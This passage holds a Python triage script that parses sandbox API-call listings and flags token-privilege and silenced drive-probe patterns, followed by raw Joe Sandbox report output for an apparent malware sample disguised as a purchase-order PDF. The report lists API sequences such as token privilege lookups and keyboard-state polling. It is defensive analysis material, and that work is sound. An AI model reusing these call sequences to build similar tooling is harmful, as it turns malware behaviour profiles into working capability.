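SAMPLE = """\
APIs
• GetCurrentProcess.KERNEL32(00000008,00000000,?,?), ref: 00439409
• OpenThreadToken.ADVAPI32(00000000,?,?,?), ref: 0043940C
• GetCurrentProcess.KERNEL32(00000008,?,?), ref: 0043941D
• OpenProcessToken.ADVAPI32(00000000,?,?), ref: 00439420
• LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
• LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
• _memcmp.LIBCMT ref: 004394A9
• CloseHandle.KERNEL32(?,?), ref: 004394F8
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D848
• GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
APIs
• ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
• DestroyIcon.USER32(?), ref: 0046FFCC
"""

# One listing line: "• Api.MODULE(args), ref: ADDR"; args and the comma are absent for
# calls the plugin shows without parameters (e.g. "_memcmp.LIBCMT ref: ...").
LINE_RE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

SEM_FAILCRITICALERRORS = 0x0001  # documented SetErrorMode flag


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple   # int for hex literals, str for named values, None for '?'
    ref: int      # call-site address from the listing


def parse_arg(tok):
    """Heuristic (assumption): '?' is unknown, all-hex tokens are numbers, else a name."""
    tok = tok.strip()
    if tok == "?":
        return None
    try:
        return int(tok, 16)
    except ValueError:
        return tok


def parse_listing(text):
    """Split report text into functions (one per 'APIs' header), each a list of ApiCall."""
    functions, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if line == "APIs":
            current = []
            functions.append(current)
            continue
        m = LINE_RE.match(line)
        if not m or current is None:
            continue  # Strings / Memory Dump Source / hash lines are not API calls
        raw = m.group("args")
        args = tuple(parse_arg(a) for a in raw.split(",")) if raw else ()
        current.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return functions


def has(func, api):
    return any(c.api == api for c in func)


def rule_token_privilege_check(func):
    """Token opened and SeAssignPrimaryTokenPrivilege looked up: CreateProcessAsUser prerequisite."""
    names = {a for c in func if c.api == "LookupPrivilegeValueW" for a in c.args if isinstance(a, str)}
    if (has(func, "OpenProcessToken") or has(func, "OpenThreadToken")) and "SeAssignPrimaryTokenPrivilege" in names:
        return "queries token for " + ", ".join(sorted(names)) + " (privileges CreateProcessAsUser needs)"
    return None


def rule_silenced_drive_probe(func):
    """GetDriveTypeW with SEM_FAILCRITICALERRORS set: drive enumeration without 'insert disk' dialogs."""
    silenced = any(c.api == "SetErrorMode" and c.args and c.args[0] is not None
                   and c.args[0] & SEM_FAILCRITICALERRORS for c in func)
    if silenced and has(func, "GetDriveTypeW"):
        return "probes drive types with critical-error dialogs suppressed"
    return None


RULES = [("token-privilege-check", rule_token_privilege_check),
         ("silenced-drive-probe", rule_silenced_drive_probe)]


def triage(text):
    """Return (first call-site address, rule name, note) for every function matching a rule."""
    findings = []
    for func in parse_listing(text):
        if not func:
            continue
        for name, rule in RULES:
            note = rule(func)
            if note:
                findings.append((f"{func[0].ref:08X}", name, note))
    return findings


if __name__ == "__main__":
    for ref, name, note in triage(SAMPLE):
        print(f"{ref} {name}: {note}")
```

The address in each finding is the first call site of the function, which is how the listing itself is keyed, so the finding can be walked back to the `ref:` lines and the `xrefs:` under Strings. The hex heuristic is a known weakness: a named value made only of hex digits would be parsed as a number, which is why the rules match on explicit privilege names rather than on numeric arguments wherever a name is available.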
APIs
• SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
• SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
• SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
• SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004673ED
• SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
• SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
• SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
• SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 00467559
• SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                                                                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004675E4
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1932665248-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 2f069d425a14989955c91583bf1eee78d18cf75f4644af0e6fd4452b58d9bd04
                                                                                                                                                                                                                                                                                                            • Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f069d425a14989955c91583bf1eee78d18cf75f4644af0e6fd4452b58d9bd04
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004481A7
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004481BA
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$LongWindow_memset
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 830647256-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                                                                                                                                                                                                                                                            • Instruction ID: 69fd08a602074ed3d664547bad3ac5a94a9e6c02d61aa1d07dc3907ec7ad0976
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41616F70208341AFE310DF54C881FABB7A4FF89704F14465EFA909B2D1DBB5A945CB56
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                                                                                                                                                                                                                                            • DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
                                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0046EB04
                                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0046EB18
                                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0046EB24
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00630053), ref: 0046EB4F
                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(00690072), ref: 0046EB67
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000001), ref: 0046EB7F
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(004C0049), ref: 0046EB97
                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 0046EBBF
                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 0046EBCD
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
• String ID:
• API String ID: 802431696-0
• Opcode ID: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
• Instruction ID: 42d633cefbe7d7192e7a113645d0a532909e6831d49db23f2259be933aabe8c6
• Opcode Fuzzy Hash: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
• Instruction Fuzzy Hash: 17513178600202DFDB14DF26D894E2A77E9FB4AB14B54446EE502CB361EB38EC41CB5E
APIs
• GetKeyboardState.USER32(?,?,?), ref: 00444D8A
• GetAsyncKeyState.USER32(000000A0), ref: 00444E0F
• GetKeyState.USER32(000000A0), ref: 00444E26
• GetAsyncKeyState.USER32(000000A1), ref: 00444E40
• GetKeyState.USER32(000000A1), ref: 00444E51
• GetAsyncKeyState.USER32(00000011), ref: 00444E69
• GetKeyState.USER32(00000011), ref: 00444E77
• GetAsyncKeyState.USER32(00000012), ref: 00444E8F
• GetKeyState.USER32(00000012), ref: 00444E9D
• GetAsyncKeyState.USER32(0000005B), ref: 00444EB5
• GetKeyState.USER32(0000005B), ref: 00444EC3
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
• Instruction ID: c605e69a62dfc64c618b97cb3a1930d242a0674024be490a091b983f03ece729
• Opcode Fuzzy Hash: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
• Instruction Fuzzy Hash: 6A41C3646087C52DFB31966484017E7FFD16FA2708F58844FD1C5067C2DBAEA9C8C7AA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID:
• String ID: HH
• API String ID: 0-2761332787
• Opcode ID: adf9b533baf9c6d895fed7716c62bbc7555b06f3d13ea9c408be328cba3f13f9
• Instruction ID: 1932890218e454eaab518c2d08cf67ea4bcb6b95680f1d85a47b5a5cee1eebd3
• Opcode Fuzzy Hash: adf9b533baf9c6d895fed7716c62bbc7555b06f3d13ea9c408be328cba3f13f9
• Instruction Fuzzy Hash: 99A1A1726043009BD710EF65DC82B6BB3E9ABD4718F008E2EF558E7281D779E9448B5A
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
• SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,00001036,00000000,?,000000FF,?,SysListView32,004848E8,00000000), ref: 004508FC
• _wcslen.LIBCMT ref: 00450944
• _wcscat.LIBCMT ref: 00450955
• SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
• SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: MessageSend$Window_wcscat_wcslen
• String ID: -----$SysListView32
• API String ID: 4008455318-3975388722
• Opcode ID: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
• Instruction ID: 786a3889ee88f98d9b0e9b4b0e1dacf7018a6923f31dd28eeaa3c07ad082d1a6
• Opcode Fuzzy Hash: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
• Instruction Fuzzy Hash: 17519470504340ABE330DB65C885FABB3E4AF84714F104E1EFA94972D3D6B99989CB65
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00448625
                                                                                                                                                                                                                                                                                                            • CreateMenu.USER32 ref: 0044863C
                                                                                                                                                                                                                                                                                                            • SetMenu.USER32(?,00000000), ref: 0044864C
                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 004486D6
                                                                                                                                                                                                                                                                                                            • IsMenu.USER32(?), ref: 004486EB
                                                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 004486F5
                                                                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 00448739
                                                                                                                                                                                                                                                                                                            • DrawMenuBar.USER32 ref: 00448742
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                                            • API String ID: 176399719-4108050209
                                                                                                                                                                                                                                                                                                            • Opcode ID: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                                                                                                                                                                                                                                                            • Instruction ID: 98f94d81d6847d6484dd50bbdc77a0bd9f9f2d632c710d3394220f00cc789bef
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86417675604201AFD700CF68D894A9BBBE4FF89314F14891EFA488B350DBB5A845CFA6
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
                                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 00469289
                                                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 004692A4
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
                                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 004692AE
                                                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 004692C7
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$CtrlParent$_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                            • API String ID: 2040099840-1403004172
                                                                                                                                                                                                                                                                                                            • Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                                                                                                                                                                                                                                            • Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
                                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 00469483
                                                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 0046949E
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
                                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 004694A8
                                                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 004694C1
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: MessageSend$CtrlParent$_wcslen
• String ID: ComboBox$ListBox
• API String ID: 2040099840-1403004172
APIs
  • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
• SendMessageW.USER32(75A923D0,00001001,00000000,00000000), ref: 00448E73
• SendMessageW.USER32(75A923D0,00001026,00000000,00000000), ref: 00448E7E
  • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
